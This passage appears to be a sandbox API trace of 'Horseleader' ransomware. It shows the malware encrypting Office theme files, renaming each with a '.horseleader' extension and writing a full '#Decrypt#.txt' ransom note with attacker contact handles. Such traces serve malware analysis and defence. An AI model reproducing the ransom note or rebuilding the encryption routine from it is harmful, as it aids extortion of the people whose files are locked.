returned 1 [0246.427] GetProcessHeap () returned 0x780000 [0246.427] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.427] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM.horseleader") returned 91 [0246.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm.horseleader")) returned 1 [0246.428] GetProcessHeap () returned 0x780000 [0246.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.429] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51c50cb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x262, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CASCADE.INF", cAlternateFileName="")) returned 1 [0246.429] lstrcmpiW (lpString1="CASCADE.INF", lpString2="Windows") returned -1 [0246.429] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF") returned 79 [0246.429] StrStrIW (lpFirst="CASCADE.INF", lpSrch=".horseleader") returned 0x0 [0246.429] lstrcmpW (lpString1="CASCADE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.429] lstrcmpW (lpString1="CASCADE.INF", lpString2="_uninstalling_.png") returned 1 [0246.429] lstrlenW (lpString=".testttjffg") returned 11 [0246.429] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF", lpSrch=".testttjffg") returned 0x0 [0246.429] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.429] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.430] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF") returned 79 [0246.430] StrStrW (lpFirst="CASCADE.INF", lpSrch=".txt") returned 0x0 [0246.430] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=610) returned 1 [0246.430] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x262, lpOverlapped=0x0) returned 1 [0246.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x262, lpOverlapped=0x0) returned 1 [0246.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.433] CloseHandle (hObject=0x1a4) returned 1 [0246.433] GetProcessHeap () returned 0x780000 [0246.433] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.433] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF.horseleader") returned 91 [0246.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\CASCADE\\CASCADE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.inf.horseleader")) returned 1 [0246.437] GetProcessHeap () returned 0x780000 [0246.437] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.437] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x553, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.437] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.437] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 79 [0246.437] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.437] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.437] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.437] lstrlenW (lpString=".testttjffg") returned 11 [0246.437] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.438] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.438] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.438] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 79 [0246.438] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.439] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1363) returned 1 [0246.439] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x553, lpOverlapped=0x0) returned 1 [0246.441] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffaad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.441] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x553, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x553, lpOverlapped=0x0) returned 1 [0246.441] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.442] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.442] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.442] CloseHandle (hObject=0x1a4) returned 1 [0246.442] GetProcessHeap () returned 0x780000 [0246.442] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.442] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.horseleader") returned 91 [0246.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.horseleader")) returned 1 [0246.443] GetProcessHeap () returned 0x780000 [0246.443] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.443] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4f93, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.443] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.443] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 80 [0246.444] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 
[0246.444] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.444] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.444] lstrlenW (lpString=".testttjffg") returned 11 [0246.444] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.444] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.444] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 80 [0246.445] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.445] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=20371) returned 1 [0246.445] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4f93, lpOverlapped=0x0) returned 1 [0246.448] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb06d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.448] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4f93, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x4f93, lpOverlapped=0x0) returned 1 [0246.448] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.448] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.448] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.449] CloseHandle (hObject=0x1a4) returned 1 [0246.449] GetProcessHeap () returned 0x780000 [0246.449] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.449] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.horseleader") returned 92 [0246.449] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.horseleader")) returned 1 [0246.450] GetProcessHeap () returned 0x780000 [0246.450] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.450] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4f93, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.450] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.450] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\#Decrypt#.txt") returned 81 [0246.450] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.451] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.451] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.452] lstrlenA (lpString="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") returned 1368 [0246.452] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.453] CloseHandle (hObject=0x158) returned 1 [0246.453] GetProcessHeap () returned 0x780000 [0246.453] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.453] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="COMPASS", cAlternateFileName="")) returned 1 [0246.453] lstrcmpiW (lpString1="COMPASS", lpString2="Windows") returned -1 [0246.453] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS") returned 67 [0246.453] lstrcmpW (lpString1="COMPASS", lpString2=".") returned 1 [0246.453] lstrcmpW (lpString1="COMPASS", lpString2="..") returned 1 [0246.453] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.453] GetProcessHeap () returned 0x780000 [0246.453] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.453] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*") returned 69 [0246.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.455] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.455] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\.") returned 69 [0246.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.455] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.455] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.455] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\..") returned 70 [0246.455] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0246.455] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.455] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17d4300, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x6041aaf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf17d4300, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xd613, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="COMPASS.ELM", cAlternateFileName="")) returned 1 [0246.455] lstrcmpiW (lpString1="COMPASS.ELM", lpString2="Windows") returned -1 [0246.455] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM") returned 79 [0246.455] StrStrIW (lpFirst="COMPASS.ELM", lpSrch=".horseleader") returned 0x0 [0246.455] lstrcmpW (lpString1="COMPASS.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.455] lstrcmpW (lpString1="COMPASS.ELM", lpString2="_uninstalling_.png") returned 1 [0246.455] lstrlenW (lpString=".testttjffg") returned 11 [0246.455] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM", lpSrch=".testttjffg") returned 0x0 [0246.455] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.455] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.456] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM") returned 79 [0246.457] StrStrW (lpFirst="COMPASS.ELM", lpSrch=".txt") returned 0x0 [0246.457] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=54803) returned 1 [0246.457] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.462] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.462] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.462] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.462] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.463] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.463] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3613, lpOverlapped=0x0) returned 1 [0246.463] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc9ed, lpNewFilePointer=0xffffffff, 
